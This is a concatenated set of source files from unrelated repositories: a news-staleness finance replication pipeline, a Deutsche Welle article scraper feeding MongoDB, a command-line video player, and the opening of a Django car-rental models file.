extra_day_index = pdatabase1.dates.index(int(dates[len(dates) - 1])) + 1
dates.append(str(pdatabase1.dates[extra_day_index]))
# store data
lists = {'dependent': [], 'AbnPctOld': [], 'Stories': [], 'AbnStories': [], 'Terms': [], 'MCap': [],
'BM': [], 'AbnRet': [], 'AbnVol': [], 'AbnVolitility': [], 'Illiq': [], 'date': []}
entries = 0
# -1 to account for extra day appended
for i in range(len(dates) - 1):
print("DAY T: " + dates[i])
for firm in firms:
# skip firms where no data is available on date
if eight:
dependent_var = u.abnormalReturnDate(firm, dates[i + 1], pdatabase1, False)
if dependent_var == -1:
continue
else:
dependent_var = u.abnormalVolDate(firm, dates[i + 1], pdatabase1, False)
if dependent_var == -1:
continue
abn_pct_old = u.abnormalPercentageOld(firm, dates[i], mdatabase)
if abn_pct_old == -1:
continue
x = u.generateXList(firm, dates[i], mdatabase, pdatabase1, pdatabase2, False)
if not x:
continue
if eight:
lists['dependent'].append(abs(dependent_var))
else:
lists['dependent'].append(dependent_var)
lists['AbnPctOld'].append(abn_pct_old)
lists['Stories'].append(x[0])
lists['AbnStories'].append(x[1])
lists['Terms'].append(x[2])
lists['MCap'].append(x[3])
lists['BM'].append(x[4])
lists['AbnRet'].append(x[5])
lists['AbnVol'].append(x[6])
lists['AbnVolitility'].append(x[7])
lists['Illiq'].append(x[8])
lists['date'].append(dates[i])
entries += 1
# Create pandas data frame and to write out
df = pd.DataFrame({"date": lists['date'], "dependent": lists['dependent'], "AbnPctOld": lists['AbnPctOld'],
"Stories": lists['Stories'], "AbnStories": lists['AbnStories'], "Terms": lists['Terms'],
"MCap": lists['MCap'], "BM": lists['BM'], "AbnRet": lists['AbnRet'], "AbnVol": lists['AbnVol'],
"AbnVolitility": lists['AbnVolitility'], "Illiq": lists['Illiq']})
print("ENTRIES: " + str(entries))
print("COLUMNS: " + str(len(lists.keys())))
if eight:
# output fm_data_8_start_end.csv
df.to_csv('fm_data_8_' + str(dates[0]) + "_" + str(dates[len(dates) - 2]) + ".csv", index=False)
else:
# output fm_data_9_start_end.csv
df.to_csv('fm_data_9_' + str(dates[0]) + "_" + str(dates[len(dates) - 2]) + ".csv", index=False)
def generate_csv10_11(dates, firms, mdatabase, pdatabase1, pdatabase2, ten=True):
"""
Writes csv file for computation over dates given
dates: list of days in order from starting date to ending date, each date represents a date t used for computation
firms: list of tickers of interest
mdatabase: database of news measures
pdatabase1: crsp data frame
pdatabase2: compustat data frame
ten: True computes equation 10, False computes equation 11
equation (13) uses equation 10 computation, calling this function for each year
"""
# append one day at the end for very last t+1 query
if not pdatabase1.dates:
pdatabase1.recordDates("date", False) # "date" is a col name in crsp
extra_day_index = pdatabase1.dates.index(int(dates[len(dates) - 1])) + 1
dates.append(str(pdatabase1.dates[extra_day_index]))
# store data
lists = {'dependent': [], 'AbnPctOld': [], 'AbnPcrRecombinations': [], 'Stories': [], 'AbnStories': [],
'Terms': [], 'MCap': [], 'BM': [], 'AbnRet': [], 'AbnVol': [], 'AbnVolitility': [], 'Illiq': [],
'date': []}
entries = 0
# -1 to account for extra day appended
for i in range(len(dates) - 1):
print("DAY T: " + dates[i])
for firm in firms:
# skip firms where no data is available on date
if ten:
dependent_var = u.abnormalReturnDate(firm, dates[i + 1], pdatabase1, False)
if dependent_var == -1:
continue
else:
dependent_var = u.abnormalVolDate(firm, dates[i + 1], pdatabase1, False)
if dependent_var == -1:
continue
abn_pct_old = u.abnormalPercentageOld(firm, dates[i], mdatabase)
if abn_pct_old == -1:
continue
abn_pct_rec = u.abnormalPercentageRecombinations(firm, dates[i], mdatabase)
if abn_pct_rec == -1:
continue
x = u.generateXList(firm, dates[i], mdatabase, pdatabase1, pdatabase2, False)
if not x:
continue
if ten:
lists['dependent'].append(abs(dependent_var))
else:
lists['dependent'].append(dependent_var)
lists['AbnPctOld'].append(abn_pct_old)
lists['AbnPcrRecombinations'].append(abn_pct_rec)
lists['Stories'].append(x[0])
lists['AbnStories'].append(x[1])
lists['Terms'].append(x[2])
lists['MCap'].append(x[3])
lists['BM'].append(x[4])
lists['AbnRet'].append(x[5])
lists['AbnVol'].append(x[6])
lists['AbnVolitility'].append(x[7])
lists['Illiq'].append(x[8])
lists['date'].append(dates[i])
entries += 1
# Create pandas data frame and to write out
df = pd.DataFrame({"date": lists['date'], "dependent": lists['dependent'], "AbnPctOld": lists['AbnPctOld'],
"AbnPcrRecombinations": lists['AbnPcrRecombinations'], "Stories": lists['Stories'],
"AbnStories": lists['AbnStories'], "Terms": lists['Terms'], "MCap": lists['MCap'],
"BM": lists['BM'], "AbnRet": lists['AbnRet'], "AbnVol": lists['AbnVol'],
"AbnVolitility": lists['AbnVolitility'], "Illiq": lists['Illiq']})
print("ENTRIES: " + str(entries))
print("COLUMNS: " + str(len(lists.keys())))
if ten:
# output fm_data_10_start_end.csv
df.to_csv('fm_data_10_' + str(dates[0]) + "_" + str(dates[len(dates) - 2]) + ".csv", index=False)
else:
# output fm_data_11_start_end.csv
df.to_csv('fm_data_11_' + str(dates[0]) + "_" + str(dates[len(dates) - 2]) + ".csv", index=False)
def generate_csv12(dates, firms, mdatabase, pdatabase1, pdatabase2, t1, t2):
"""
Writes csv file for computation over dates given
dates: list of days in order from starting date to ending date, each date represents a date t used for computation
firms: list of tickers of interest
mdatabase: database of news measures
pdatabase1: crsp data frame
pdatabase2: compustat data frame
t1, t2: used for AbnRet date range [t+t1, t+t2] where t is current reference day
"""
# append t2 additional days at the end for last few dependent variable queries
if not pdatabase1.dates:
pdatabase1.recordDates("date", False) # "date" is a col name in crsp
extra_day_start_index = pdatabase1.dates.index(int(dates[len(dates) - 1])) + 1
for i in range(t2):
dates.append(str(pdatabase1.dates[extra_day_start_index + i]))
# store data
lists = {'dependent': [], 'AbnPcrOld': [], 'AbnPcrOldXAbnRet': [], 'AbnRet': [], 'AbnPcrRecombinations': [],
'AbnPcrRecombinationsXAbnRet': [], 'Stories': [], 'AbnStories': [], 'Terms': [], 'MCap': [], 'BM': [],
'AbnRetVect': [], 'AbnVol': [], 'AbnVolitility': [], 'Illiq': [], 'date': []}
entries = 0
# -t2 to account for extra days appended
for i in range(len(dates) - t2):
print("DAY T: " + dates[i])
for firm in firms:
# skip firms where no data is available on date
dependent_var = u.abnormalReturn(firm, dates[i + t1], dates[i + t2], pdatabase1, False)
if dependent_var == -1:
continue
abn_pcr_old = u.abnormalPercentageOld(firm, dates[i], mdatabase)
if abn_pcr_old == -1:
continue
abn_ret_next = u.abnormalReturnDate(firm, dates[i + 1], pdatabase1, False)
if abn_ret_next == -1:
continue
abn_pcr_rec = u.abnormalPercentageRecombinations(firm, dates[i], mdatabase)
if abn_pcr_rec == -1:
continue
x = u.generateXList(firm, dates[i], mdatabase, pdatabase1, pdatabase2, False)
if not x:
continue
lists['dependent'].append(dependent_var)
lists['AbnPcrOld'].append(abn_pcr_old)
lists['AbnPcrOldXAbnRet'].append(abn_pcr_old * abn_ret_next)
lists['AbnRet'].append(abn_ret_next)
lists['AbnPcrRecombinations'].append(abn_pcr_rec)
lists['AbnPcrRecombinationsXAbnRet'].append(abn_pcr_rec * abn_ret_next)
lists['Stories'].append(x[0])
lists['AbnStories'].append(x[1])
lists['Terms'].append(x[2])
lists['MCap'].append(x[3])
lists['BM'].append(x[4])
lists['AbnRetVect'].append(x[5])
lists['AbnVol'].append(x[6])
lists['AbnVolitility'].append(x[7])
lists['Illiq'].append(x[8])
lists['date'].append(dates[i])
entries += 1
# Create pandas data frame and to write out
df = pd.DataFrame({"date": lists['date'], "dependent": lists['dependent'], "AbnPcrOld": lists['AbnPcrOld'],
"AbnPcrOldXAbnRet": lists['AbnPcrOldXAbnRet'], "AbnRet": lists['AbnRet'],
"AbnPcrRecombinations": lists['AbnPcrRecombinations'],
"AbnPcrRecombinationsXAbnRet": lists['AbnPcrRecombinationsXAbnRet'],
"Stories": lists['Stories'], "AbnStories": lists['AbnStories'], "Terms": lists['Terms'],
"MCap": lists['MCap'], "BM": lists['BM'], "AbnRetVect": lists['AbnRetVect'],
"AbnVol": lists['AbnVol'], "AbnVolitility": lists['AbnVolitility'], "Illiq": lists['Illiq']})
print("ENTRIES: " + str(entries))
print("COLUMNS: " + str(len(lists.keys())))
# output fm_data_12_start_end_t1_t2.csv
    df.to_csv('fm_data_12_' + str(dates[0]) + "_" + str(dates[len(dates) - t2 - 1])
+ "_" + str(t1) + "_" + str(t2) + ".csv", index=False)
```
#### File: replication/object/Article.py
```python
import dateutil.parser
import xml.etree.ElementTree as ET
from ETUtils import *
class Article:
"""
Class that represents a generic article.
"""
def __init__(self, text):
"""
Takes as input an XML string, and populates the features of an
article.
"""
try:
et = ET.fromstring(text) # Some articles do not parse correctly.
self.accessionNumber = accessionNum(et)
self.displayDate = dateutil.parser.parse(displayDate(et)).timestamp()
self.tickers = tickercreator(et)
self.text = article(et)
self.headline = headline(et)
self.bad = False
        except Exception:
            # mark malformed articles so callers can skip them
            self.bad = True
def __lt__(self, other):
"""
Used to break ties when ordering in a heap queue.
"""
return False
```
#### File: replication/object/BSBManager.py
```python
from multiprocessing import Process, Queue, Pipe
from Article import Article as Story
import csv
import os
from LL import *
import heapq
def processor(q, simObject, temp_save):
"""
    Worker that will process a queue of stories.
"""
with open(temp_save, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID', 'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB'])
companies = dict()
while True:
story, ticker = q.get(block=True)
if ticker == "ad mortem":
break
if ticker not in companies:
companies[ticker] = myLinkedList()
p = simObject.staleNewsProcedure(ticker, story, companies[ticker])
writer.writerow(p)
def supplier(pipe, Story, simObject):
"""
    Worker that cleans stories.
"""
while True:
et = pipe.recv()
if et == "ad mortem":
break
else:
s = Story(et)
simObject.preprocessing(s)
pipe.send(s)
def merge(endlocation, temp_files):
"""
    Merges together sorted files into one larger file. Deletes the temp_files
    after the merge.
"""
files = [open(file, 'r') for file in temp_files]
filedata = {i: csv.reader(file, delimiter=',') for i, file in enumerate(files)}
temp = list()
for i in range(len(temp_files)):
next(filedata[i])
newline = next(filedata[i])
heapq.heappush(temp, (newline[0], i, newline))
with open(endlocation, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID', 'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB'])
while temp:
_, f, data = heapq.heappop(temp)
writer.writerow(data)
try:
newline = next(filedata[f])
except StopIteration:
newline = None
if newline:
heapq.heappush(temp, (newline[0], f, newline))
[file.close() for file in files]
[os.remove(file) for file in temp_files]
def worker_init(count, t, simObject=None):
"""
starts up the worker processes.
"""
workers, worker_processes = list(), list()
for i in range(count):
if t == "supplier":
a, b = Pipe()
worker = Process(target=supplier, args=((b), (Story), (simObject)))
worker.start()
workers.append(a)
worker_processes.append(worker)
elif t == "processor":
temp_save = f"temp_file_{i}.csv"
queue = Queue()
worker = Process(target=processor, args=((queue), (simObject), (temp_save)))
worker_processes.append(worker)
worker.start()
workers.append(queue)
return workers, worker_processes
```
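The `merge` helper performs a heap-based k-way merge of the per-worker CSVs, each of which is already sorted by its first column (DATE_EST). A small standalone sketch (not repository code; the file names and rows are made up, and the import assumes `BSBManager.py` is importable):
```python
import csv
from BSBManager import merge

header = ['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID',
          'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB']
rows = {
    "temp_file_0.csv": [["1420110900.0", "id-1", "AAA", "120", "", "", "", "0.1", "False", "False", "False"]],
    "temp_file_1.csv": [["1420107300.0", "id-2", "BBB", "95", "", "", "", "0.2", "False", "False", "False"]],
}
for name, data in rows.items():
    with open(name, "w", newline="") as f:
        w = csv.writer(f)
        w.writerow(header)
        w.writerows(data)

# writes merged.csv ordered by DATE_EST and deletes the temp files afterwards
merge("merged.csv", list(rows.keys()))
```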
#### File: code/replication/StaleNewsProcedureMultiprocessing.py
```python
import xml.etree.ElementTree as ET
import re
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import nltk
from nltk.stem.porter import *
from pytz import timezone
import dateutil.parser
import datetime
import heapq
import numpy as np
import csv
import sys
import os
import time
from multiprocessing import Process, Queue, Pipe, cpu_count
import glob
fs = glob.glob('data/*.nml')
eastern = timezone('US/Eastern')
stop_words = set(stopwords.words('english'))
stemmer = PorterStemmer()
stemDict = dict()
wordDict = dict()
def xmlTreeGetter(filename):
'''
A getter function for each article. When next is called, it will return the
next article. The files are split by the </doc> tag, which is at the end
of every article.
'''
nmlFile = open(filename)
text = ""
for line in nmlFile:
text += line
if "</doc>" in line:
yield ET.fromstring(text)
text = ""
def article(etree):
'''Given etree, return article'''
art = etree.find("djnml").find("body").find("text")
article = ""
if art is None:
return article
else:
for element in art:
article += element.text
return article
def headline(etree):
'''Given etree, return headline'''
return etree.find("djnml").find("body").find("headline").text
def tickercreator(etree):
'''Given etree, return ticker list'''
#ft.begin("tickercreator")
tik = etree.find("djnml").find("head").find("docdata").find("djn").find("djn-newswires").find("djn-mdata").find("djn-coding").find("djn-company")
tickers = []
if tik is None:
return tickers
for t in tik:
tickers += [t.text]
return tickers
def accessionNum(etree):
    '''Given etree, return accession number'''
return etree.attrib['md5']
def displayDate(etree):
    '''Given etree, return display date'''
return etree.find("djnml").find("head").find("docdata").find("djn").find("djn-newswires").find("djn-mdata").attrib['display-date']
def stem(tokenizedWords):
"""
    Returns a set of stemmed words.
"""
r = set()
for word in tokenizedWords:
if word in wordDict:
add = wordDict[word]
else:
add = stemmer.stem(word)
wordDict[word] = add
r.add(add)
return r
def stop(tokenizedWords):
"""
returns a set with stop words removed.
"""
filtered = set()
for word in tokenizedWords:
if word not in stop_words:
filtered.add(word)
return filtered
def similaritytest(orig, others):
"""
returns a similarity score between stemmed article orig
    and a list of stemmed articles.
"""
B = set.union(*[story.textWords for story in others])
A = orig.textWords.intersection(B)
return len(A) / len(orig.textWords)
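# Worked example for similaritytest (illustrative only, invented word sets): if the new
# story's stemmed set is {"acm", "beat", "estim", "quarter"} and the union of the
# neighbors' sets is {"acm", "beat", "estim", "share"}, then the intersection has
# 3 words and the score is 3 / 4 = 0.75, which stale() below treats as old news (>= 0.6).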
def stale(origStory, neighborStories, simtest):
'''
Determines the staleness of news given origStory and neighborStories.
'''
r = [False, False, False, 0]
if (len(neighborStories) == 0):
return r
else:
others = [story_tuple[1] for story_tuple in neighborStories]
stale_score = simtest(origStory, others)
stale_max = neighborStories[0][0]
r[3] = stale_score
if (stale_score >= 0.6):
r[0] = True
if (stale_max >= 0.8):
r[1] = True
else:
r[2] = True
return r
def staleNewsProcedure(ticker, story, companies, simtest):
'''
    Performs the stale news procedure for one article. Returns the similarity
information for this article compared to the articles up to 72 hours prior.
'''
companyLL = companies[ticker]
companyLL.resetCurr()
compStory = companyLL.nextNode()
maxpq = []
while (compStory != None):
if story.displayDate - compStory.displayDate > 259200:
            companyLL.cut()
            break
sim = simtest(story, [compStory])
heapq.heappush(maxpq, (sim, compStory))
compStory = companyLL.nextNode()
largestFive = heapq.nlargest(5, maxpq)
old_reprint_recomb = stale(story, largestFive, simtest)
companies[ticker].addFront(story)
if (largestFive != []):
largestacc = largestFive[0][1].accessionNumber
largestsim = largestFive[0][0]
else:
largestacc = None
largestsim = None
if (len(largestFive) > 1):
secondlargestacc = largestFive[1][1].accessionNumber
else:
secondlargestacc = None
return [story.displayDate, story.accessionNumber, ticker, len(story.textWords), largestacc, secondlargestacc, largestsim, old_reprint_recomb[3], old_reprint_recomb[0], old_reprint_recomb[1], old_reprint_recomb[2]]
class Story:
'''A story class. Contains all of the information useful from each story.'''
accessionNumber = 0
displayDate = 0
tickers = []
headline = ""
text = "";
textWords = set()
sim = -1
def __init__(self, et=None):
self.accessionNumber = accessionNum(et)
self.displayDate = dateutil.parser.parse(displayDate(et)).timestamp()
self.tickers = tickercreator(et)
self.text = article(et)
self.textWords = stop(stem(word_tokenize(article(et))))
self.headline = headline(et)
def from_other(self, number, date, tick, txt, s):
        self.accessionNumber = number
self.displayDate = date
self.tickers = tick
self.text = txt
self.sim = s
def __lt__ (self, other):
if (type(other) == int):
return self.sim < other
return self.sim < other.sim
class myLinkedList:
'''
A linked list. One key property of this LL is that the next node can be
called with nextNode.If cut is called, the LL will be pruned (or cut) at
the location of nextNode, so that unnecessary information can be easily
removed.
'''
head = None
end = None
curr = None
def __init__(self):
self.head = LLNode("sentinel")
self.end = self.head
def addFront(self, val):
self.head.nextNode = LLNode(val, self.head.nextNode)
def resetCurr(self):
self.curr = self.head
def nextNode(self):
self.curr = self.curr.nextNode
if (self.curr == None):
return None
t = self.curr.val
return t
def cut(self):
self.curr.nextNode = None
class LLNode():
val = None;
nextNode = None;
def __init__(self, val=None, nextNode=None):
self.val = val
self.nextNode = nextNode
def processor(q, simtest, temp_save):
"""
    Worker that will process a queue of stories.
"""
with open(temp_save, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID', 'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB'])
companies = dict()
while True:
story, ticker = q.get(block=True)
if ticker == "ad mortem":
break
if ticker not in companies:
companies[ticker] = myLinkedList()
p = staleNewsProcedure(ticker, story, companies, simtest)
writer.writerow(p)
def supplier(pipe, Story):
"""
    Worker that cleans stories.
"""
while True:
et = pipe.recv()
if et == "ad mortem":
break
else:
pipe.send(Story(et))
def merge(endlocation, temp_files):
"""
    Merges together sorted files into one larger file. Deletes the temp_files
    after the merge.
"""
files = [open(file, 'r') for file in temp_files]
filedata = {i: csv.reader(file, delimiter=',') for i, file in enumerate(files)}
temp = list()
for i in range(len(temp_files)):
next(filedata[i])
newline = next(filedata[i])
heapq.heappush(temp, (newline[0], i, newline))
with open(endlocation, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID', 'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB'])
while temp:
_, f, data = heapq.heappop(temp)
writer.writerow(data)
try:
newline = next(filedata[f])
except StopIteration:
newline = None
if newline:
heapq.heappush(temp, (newline[0], f, newline))
[file.close() for file in files]
[os.remove(file) for file in temp_files]
def worker_init(count, t, simtest=None):
"""
starts up the worker processes.
"""
workers, worker_processes = list(), list()
for i in range(count):
if t == "supplier":
a, b = Pipe()
worker = Process(target=supplier, args=((b), (Story)))
worker.start()
workers.append(a)
worker_processes.append(worker)
elif t == "processor":
temp_save = f"temp_file_{i}.csv"
queue = Queue()
worker = Process(target=processor, args=((queue), (simtest), (temp_save)))
worker_processes.append(worker)
worker.start()
workers.append(queue)
return workers, worker_processes
def procedure(startlocation = 'data', endlocation='export_dataframe.csv', simtest=similaritytest, worker_count=-1):
'''
    Performs the stale-news procedure over all articles in the .nml files
    found in startlocation, and exports a csv file at endlocation.
'''
if worker_count < 0:
worker_count += cpu_count() + 1
worker_count = worker_count * 2
location = sorted(glob.glob(startlocation + '/*.nml'))
companies = dict()
suppliers, supplier_processes = worker_init(worker_count, "supplier")
processors, processor_processes = worker_init(worker_count, "processor", simtest)
for f in location:
print("File processing...",f)
xtg = xmlTreeGetter(f)
for supplier in suppliers:
try:
et = next(xtg)
except:
continue
supplier.send(et)
checks, load = 0, 0
while checks < len(suppliers):
for supplier in suppliers:
if checks >= len(suppliers):
break
story = supplier.recv()
try:
et = next(xtg)
supplier.send(et)
except:
checks += 1
if not (story.tickers == []):
for ticker in story.tickers:
if '.' in ticker:
continue
if ticker not in companies:
companies[ticker] = load
load = (load + 1) % worker_count
processors[companies[ticker]].put((story, ticker))
[a.send("ad mortem") for a in suppliers]
[w.join() for w in supplier_processes]
[q.put((None, "ad mortem")) for q in processors]
[w.join() for w in processor_processes]
merge(endlocation, [f"temp_file_{i}.csv" for i in range(worker_count)])
print('Procedure finished')
if __name__ == '__main__':
start = time.time()
if len(sys.argv) == 3:
procedure(sys.argv[1], sys.argv[2])
print(time.time() - start)
else:
print(time.time() - start)
sys.exit(1)
``` |
{
"source": "Jonathan-Bonaguro/petrarch2",
"score": 3
} |
#### File: Jonathan-Bonaguro/petrarch2/dw_scraper.py
```python
from __future__ import unicode_literals
from bs4 import BeautifulSoup
import requests
import json
import re
import datetime
from pymongo import MongoClient
connection = MongoClient()
db = connection.event_scrape
collection = db["dw_test"]
url_list = ["http://www.dw.com/search/?languageCode=en&item=refugees&searchNavigationId=9097&sort=RELEVANCE&resultsCounter=1900",
"http://www.dw.com/search/?languageCode=en&item=asylum&searchNavigationId=9097&sort=RELEVANCE&resultsCounter=405"]
#"http://www.dw.com/search/?languageCode=en&item=crime&searchNavigationId=9097&sort=RELEVANCE&resultsCounter=1900",
#"http://www.dw.com/search/?languageCode=en&item=pegida&searchNavigationId=9097&sort=RELEVANCE&resultsCounter=1900",
#"http://www.dw.com/search/?languageCode=en&item=anti-semitism&searchNavigationId=9097&sort=RELEVANCE&resultsCounter=1900",
#"http://www.dw.com/search/?languageCode=en&item=hate crime&searchNavigationId=9097&sort=RELEVANCE&resultsCounter=1900"]
def get_links(url):
headers = {'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"}
result = requests.get(url, headers=headers)
soup = BeautifulSoup(result.content, "lxml")
article_boxes = soup.find_all("div", {"class" : "searchResult"})
link_stubs = []
for a in article_boxes:
b = a.find('a', href = True)
link_stubs.append(b['href'])
links = [''.join(["http://www.dw.com", i]) for i in link_stubs]
links = [i for i in links if re.search("/av-\d+$", i) is None]
links = [i for i in links if re.search("/g-\d+$", i) is None]
return links
# Taken verbatim from https://github.com/openeventdata/scraper/
def _check_mongo(url, db_collection):
"""
Private function to check if a URL appears in the database.
Parameters
----------
url: String.
URL for the news stories to be scraped.
db_collection: pymongo Collection.
Collection within MongoDB that in which results are
stored.
Returns
-------
found: Boolean.
Indicates whether or not a URL was found in the database.
"""
if db_collection.find_one({"url": url}):
found = True
else:
found = False
return found
# Taken verbatim from https://github.com/openeventdata/scraper/
def add_entry(collection, text, title, url, date, website, lang):
"""
Function that creates the dictionary of content to add to a MongoDB
instance, checks whether a given URL is already in the database, and
inserts the new content into the database.
Parameters
----------
collection : pymongo Collection.
Collection within MongoDB that in which results are stored.
text : String.
Text from a given webpage.
title : String.
Title of the news story.
url : String.
URL of the webpage from which the content was pulled.
date : String.
Date pulled from the RSS feed.
website : String.
Nickname of the site from which the content was pulled.
Returns
-------
object_id : String
"""
toInsert = {"url": url,
"title": title,
"source": website,
"date": date,
"date_added": datetime.datetime.utcnow(),
"content": text,
"stanford": 0,
"language": lang}
object_id = collection.insert_one(toInsert)
return object_id
# This is the part that's customized to DW article pages
def scrape_article(article_url, test = False):
if not test and _check_mongo(article_url, collection):
print("Duplicate URL. Skipping...")
return
headers = {'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"}
result = requests.get(article_url, headers=headers)
soup = BeautifulSoup(result.content, "lxml")
try:
body = soup.find("div", {"class" : "longText"}).find_all("p", recursive=False)
# recursive = False keeps it from going into the picture divs and pulling out the captions
# It also gets rid of the social media stuff.
body_trimmed = [i.text for i in body if re.search("<strong>", repr(i)) is None]
article_body = "\n\n".join(body_trimmed)
except Exception as e:
print("Couldn't scrape url {0} with error {1}").format(article_url, e)
return {} # is this the best behavior?
title = soup.find("div", {"id": "bodyContent"}).find("h1").text
try:
date_raw = soup.find("div", {"class" : "col1 dim"}).find("li").text
date_pieces = re.findall("\d+", date_raw)
date_pieces = [int(i) for i in date_pieces]
date = datetime.datetime(date_pieces[2], date_pieces[1], date_pieces[0])
except Exception as e:
print("Problem getting date, returning null. {0}").format(e)
return {}
if not test:
add_entry(collection, article_body, title,
article_url, date, "deutsche_welle",
"english")
if test:
article = {"url": article_url,
"title": title,
"source": "deutsche_welle",
"date": date,
"date_added": datetime.datetime.utcnow(),
"content": article_body,
"stanford": 0,
"language": "english"}
print(article)
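# Note on the date parsing above (illustrative): the scraper assumes the page lists the
# date as day.month.year, e.g. a hypothetical "21.06.2016", so re.findall("\d+", ...)
# returns ['21', '06', '2016'] and datetime.datetime(2016, 6, 21) is built from the
# pieces in reverse order; any other format falls into the except branch and the
# article is skipped.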
if __name__ == "__main__":
results = get_links(url_list[0])
print("Testing on one article:")
scrape_article(results[22], test = True)
print("\n\nNow downloading and loading into Mongo.")
for search in url_list:
results = get_links(search)
for art in results:
scrape_article(art)
print("Complete. The Mongo collection now has {0} articles in it").format(collection.count())
``` |
{
"source": "jonathanbreitg/CLIvideoPlayer",
"score": 3
} |
#### File: jonathanbreitg/CLIvideoPlayer/main.py
```python
import time
import ueberzug.lib.v0 as ueberzug
import cv2
import moviepy.editor as mp
import threading
from termcolor import colored
from slowprint.slowprint import *
import argparse
from pydub import AudioSegment
from pydub.playback import play
import os
from pynput import keyboard as pkeyboard
import keyboard
import pyautogui
parser = argparse.ArgumentParser(description='plays videos fully in the command line')
parser.add_argument('video', metavar='vid', type=str, nargs='+',help='the video to play')
args = parser.parse_args()
vid = args.video[0]
os.system('color')
#slowprint(colored("Made by Bira ❤️ ","magenta",attrs=['reverse','bold']),0.4)
def sound_thread():
global vid
name = vid.split('.')[0]
song = AudioSegment.from_mp3(f'frames//{name}audio.mp3')
play(song)
def on_activate_m():
print('got here')
def listener():
with pkeyboard.GlobalHotKeys({
'f': on_activate_m}) as m:
m.join()
def get_info(vid):
video_capture = cv2.VideoCapture(f"{vid}")
fps = video_capture.get(cv2.CAP_PROP_FPS)
total = int(video_capture.get(cv2.CAP_PROP_FRAME_COUNT))
print(f"{fps} FPS")
return fps,total
def split_vid_to_frames(vid):
global saved_frame_name
name = vid.split('.')[0]
my_clip = mp.VideoFileClip(f"{vid}")
my_clip.audio.write_audiofile(f"frames//{name}audio.mp3")
video_capture = cv2.VideoCapture(f"{vid}")
total = int(video_capture.get(cv2.CAP_PROP_FRAME_COUNT))
saved_frame_name = 0
print(name)
while video_capture.isOpened():
frame_is_read, frame = video_capture.read()
        percentage = saved_frame_name / total
        print(colored(f"%{percentage*100} done..","yellow"))
if frame_is_read:
cv2.imwrite(f"frames//{name}frame{str(saved_frame_name)}.jpg", frame)
saved_frame_name += 1
else:
print(colored("done","red",attrs=['reverse','bold']))
break
return fps
def play_from_frames(fps,saved_frame_name):
global vid
i = 0
with ueberzug.Canvas() as c:
name = vid.split('.')[0]
path = f"frames//{name}frame0.jpg"
demo = c.create_placement('demo',x=0, y=0, scaler=ueberzug.ScalerOption.COVER.value)
demo.path = path
demo.visibility = ueberzug.Visibility.VISIBLE
print(type(demo))
while True:
if i >= saved_frame_name:
break
i += 1
time.sleep(1/fps)
demo.path = f"frames//{name}frame{i}.jpg"
os._exit(1)
fps,total = get_info(vid)
splitting_thread = threading.Thread(target=split_vid_to_frames,args=[vid])
splitting_thread.start()
time.sleep(1)
playing_thread = threading.Thread(target=play_from_frames,args=[fps,total])
playing_thread.start()
audio_thread = threading.Thread(target=sound_thread)
audio_thread.start()
shortcut_thread = threading.Thread(target=listener)
shortcut_thread.start()
``` |
{
"source": "JonathanBritoR/Proyecto-Exoneracion",
"score": 2
} |
#### File: Carrental/rentaCar/models.py
```python
from decimal import Decimal
import shortuuid
from django.core.validators import RegexValidator, MinValueValidator
from django.utils import timezone
from django.db import models
# Create your models here.
from .validations import validar_digito_verificador, validar_vehiculo_rentado
def generar_numero_renta():
return shortuuid.ShortUUID().random(length=7)
class TipodeVehiculo(models.Model):
descripcion = models.CharField(max_length=30)
estado = models.BooleanField(default=False)
def __str__(self):
return self.descripcion
class Meta:
verbose_name = "Tipo de Vehiculo"
verbose_name_plural = "Tipos de Vehiculos"
class Marca(models.Model):
descripcion = models.CharField(max_length=30)
estado = models.BooleanField(default=False)
def __str__(self):
return self.descripcion
class Meta:
verbose_name = "Marca"
verbose_name_plural = "Marcas"
class Modelo(models.Model):
marca = models.ForeignKey(
'Marca',
on_delete=models.CASCADE,
)
descripcion = models.CharField(max_length=30)
estado = models.BooleanField(default=False)
def __str__(self):
return self.descripcion
class Meta:
verbose_name = "Modelo"
verbose_name_plural = "Modelos"
class TipodeCombustible(models.Model):
descripcion = models.CharField(max_length=30)
estado = models.BooleanField(default=False)
def __str__(self):
return self.descripcion
class Meta:
verbose_name = "Tipo de Combustible"
verbose_name_plural = "Tipos de Combustible"
class Vehiculo(models.Model):
descripcion = models.CharField(max_length=30)
numero_de_chasis = models.IntegerField(validators=[MinValueValidator(1)])
numero_de_motor = models.IntegerField(validators=[MinValueValidator(1)])
numero_de_placa = models.IntegerField(validators=[MinValueValidator(1)])
tipo_de_vehiculo = models.ForeignKey(
'TipodeVehiculo',
on_delete=models.CASCADE,
)
marca = models.ForeignKey(
'Marca',
on_delete=models.CASCADE,
)
modelo = models.ForeignKey(
'Modelo',
on_delete=models.CASCADE,
)
tipo_de_combustible = models.ForeignKey(
